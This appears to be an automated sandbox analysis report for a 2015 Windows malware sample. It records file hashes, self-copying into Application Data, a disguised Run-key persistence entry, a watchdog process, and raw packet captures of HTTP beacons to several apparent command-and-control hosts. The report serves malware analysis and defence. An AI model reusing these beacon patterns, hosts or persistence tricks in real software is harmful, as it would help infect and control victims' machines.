Analysis Date2015-05-13 00:27:32

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: aef82b02879d09357034738fac2220b7 sha1: 2a9b01096851e74a9f4ec42ff8c0a521c764f818 size: 299008
Section.rdata md5: 0d42f1ba67158c7334ae62a8af289bf4 sha1: 471007079f29975fd8c58cca549eab2ae0a261d6 size: 34816 md5: 3d1ba9dd7bd0f81c5a422ca38196821a sha1: 0a0377e1c801d8c2273b121019030db712c7783a size: 97280
Timestamp2014-10-30 09:51:59
PackerMicrosoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Tablet Protocol Update Location ➝
C:\Documents and Settings\Administrator\Application Data\menwsrytzppqnjl\ytvmanllrv.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\menwsrytzppqnjl\ytvmanllrv.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\menwsrytzppqnjl\ytvmanllrv.exe

↳ C:\Documents and Settings\Administrator\Application Data\menwsrytzppqnjl\ytvmanllrv.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\menwsrytzppqnjl\ytvmanllrv.aa
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\menwsrytzppqnjl\huwxqce.exe
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\menwsrytzppqnjl\ytvmanllrv.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\menwsrytzppqnjl\ytvmanllrv.exe"

Network Details:
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Flows TCP192.168.1.1:1031 ➝
Flows TCP192.168.1.1:1032 ➝
Flows TCP192.168.1.1:1033 ➝
Flows TCP192.168.1.1:1034 ➝
Flows TCP192.168.1.1:1035 ➝
Flows TCP192.168.1.1:1036 ➝
Flows TCP192.168.1.1:1037 ➝
Flows TCP192.168.1.1:1038 ➝
Flows TCP192.168.1.1:1039 ➝

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6567 61746f72 6965686f   mail=legatorieho
0x00000020 (00032)   72616e61 40796168 6f6f2e63 6f6d266d
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a2066   : close..Host: f
0x00000070 (00112)   6c696572 6265666f 72652e6e 65740d0a
0x00000080 (00128)   0d0a                                  ..

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6567 61746f72 6965686f   mail=legatorieho
0x00000020 (00032)   72616e61 40796168 6f6f2e63 6f6d266d
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a206e   : close..Host: n
0x00000070 (00112)   69676874 73707269 6e672e6e 65740d0a
0x00000080 (00128)   0d0a                                  ..

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6567 61746f72 6965686f   mail=legatorieho
0x00000020 (00032)   72616e61 40796168 6f6f2e63 6f6d266d
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a2063   : close..Host: c
0x00000070 (00112)   61707461 696e7375 63636573 732e6e65
0x00000080 (00128)   740d0a0d 0a                           t....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6567 61746f72 6965686f   mail=legatorieho
0x00000020 (00032)   72616e61 40796168 6f6f2e63 6f6d266d
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a2065   : close..Host: e
0x00000070 (00112)   6c656374 72696373 7072696e 672e6e65
0x00000080 (00128)   740d0a0d 0a                           t....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6567 61746f72 6965686f   mail=legatorieho
0x00000020 (00032)   72616e61 40796168 6f6f2e63 6f6d266d
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a2074   : close..Host: t
0x00000070 (00112)   72616465 73707269 6e672e6e 65740d0a
0x00000080 (00128)   0d0a0a0d 0a                           .....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6567 61746f72 6965686f   mail=legatorieho
0x00000020 (00032)   72616e61 40796168 6f6f2e63 6f6d266d
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a2073   : close..Host: s
0x00000070 (00112)   74726565 74737563 63657373 2e6e6574
0x00000080 (00128)   0d0a0d0a 0a                           .....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6567 61746f72 6965686f   mail=legatorieho
0x00000020 (00032)   72616e61 40796168 6f6f2e63 6f6d266d
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a2073   : close..Host: s
0x00000070 (00112)   74726565 7462616e 6b65722e 6e65740d
0x00000080 (00128)   0a0d0a0a 0a                           .....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6567 61746f72 6965686f   mail=legatorieho
0x00000020 (00032)   72616e61 40796168 6f6f2e63 6f6d266d
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a2062   : close..Host: b
0x00000070 (00112)   65747465 72737563 63657373 2e6e6574
0x00000080 (00128)   0d0a0d0a 0a                           .....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6c6567 61746f72 6965686f   mail=legatorieho
0x00000020 (00032)   72616e61 40796168 6f6f2e63 6f6d266d
0x00000030 (00048)   6574686f 643d706f 7374266c 656e2048   ethod=post&len H
0x00000040 (00064)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000050 (00080)   202a2f2a 0d0a436f 6e6e6563 74696f6e    */*..Connection
0x00000060 (00096)   3a20636c 6f73650d 0a486f73 743a2071   : close..Host: q
0x00000070 (00112)   75696574 73756363 6573732e 6e65740d
0x00000080 (00128)   0a0d0a0a 0a                           .....

An application has made an attempt to load the C runtime library incorrectly.
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
bad allocation
bad exception
 Base Class Array'
 Base Class Descriptor at (
 Class Hierarchy Descriptor'
 Complete Object Locator'
`copy constructor closure'
- CRT not initialized
dddd, MMMM dd, yyyy
`default constructor closure'
DOMAIN error
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
- floating point support not loaded
invalid string position
j hhKE
j@j ^V
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
npnitbha snbuelo nlpofdm ybasuc edl uzbtipjwo fbepa asq xtc pojyudpda lvqode folm ajp mtirutqmix utvlafpdo riruxef savajaefaj vxnuoh bybav wso mzejomsdu izjudom ctnepcpe ptbopefcea lboyisopp chreguaxf iepvapej gsjunng mkse laujzemu kwa facreeasrv oplqasfle mssuvw pqginiegl cupbol gcu cbguxpqopx xkj jatjujm xlcihi cti bcsuplf cbxu ultusef unnm apvxeomfpa nrhi bjmomt btbor ejadah jffoegpg qiotz you ykt gen asvv rtemo yopepux cqpiae mxgabcferl oelljusf gibvai cwarotm fagdebdgi nasor pidsigbg djvi sbap vbyaedid solji nzcuhwb yboj rptomucup vbnennluhj zlbo pqneiscam blisep ifdiveyj omfoo ihsgepzjo juu frtaizcpao cvbabylofj sulcic pde losuteppj lfluka dgmuv kmninho gvsorchi glefe dsmancpuf gfnic gdbuv fgfu fgugiladg yrqedls ldkoisnqij mbpotgfa ovoc orbnozcl ukcuab rmnajfm ajseuja ceumgif fjwoz faaic iapdli fdsunc jutpemedd wlbasgxeoe disgasop npne azbcemn alsbidm qqo oimiecbad ndnukpp mjtad zmdicoroha dphi tbfijmtaxq kzamadzcae bdgotsmevb bgzuqyyie vmdo dfwo acebl jfbaclv wdapip ccjocm dnfopp swwicjlegl cmgirflupf mkw jgnoxdci glfutnj tyuqoeelsp ajanpalx ztmu mlselojm rcbazapko rbi slcu snfubuv cvguemosl nicpofj aslaove jitva zikeg jjupebo cbb cmgueicivp dgj mnsomkje gmrawt zsmijjpa gboliiwn loafkuuj srsa jvyufpruts ykzilxzefm irpmagj asuyjarl xpcaljnae wqgu dhpudnou fyhooxelwi rwv gsjolgoag zmdey qis rxjiuq maeejte fjza esyti usdfeacp aoe borl rfujalt dqlaksba keuowfakd zgzaju vepmontbi emtnuntfu vljuakzj lsvuwnmudf innf gyfenzn dyl iblarin plef jnapomcgei eca epfhaarc rslodltevg fizdobl jsdo ordejel figs dvjebnw rdjisajsed cwyur flus dlx eccsatfle tptuax brf fjpokwsae ioee bvcawjheo miunde przoor jpre lbgaby jcnarnxi gga fkmurbma rcbox vzuazibey alzbe memfeguwke bjbia flni upaccila mzaoleu ignanu tnm ljgax uocmpiaegr ejjceamwg rplil
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
<program name unknown>
- pure virtual function call
r|oL tlq
runtime error 
Runtime Error!
`scalar deleting destructor'
SING error
string too long
+t HHt
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
< tK<	tG
TLOSS error
t$<"u	3
 Type Descriptor'
`udt returning'
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
Unknown exception
`vbase destructor'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`virtual displacement map'
v	N+D$
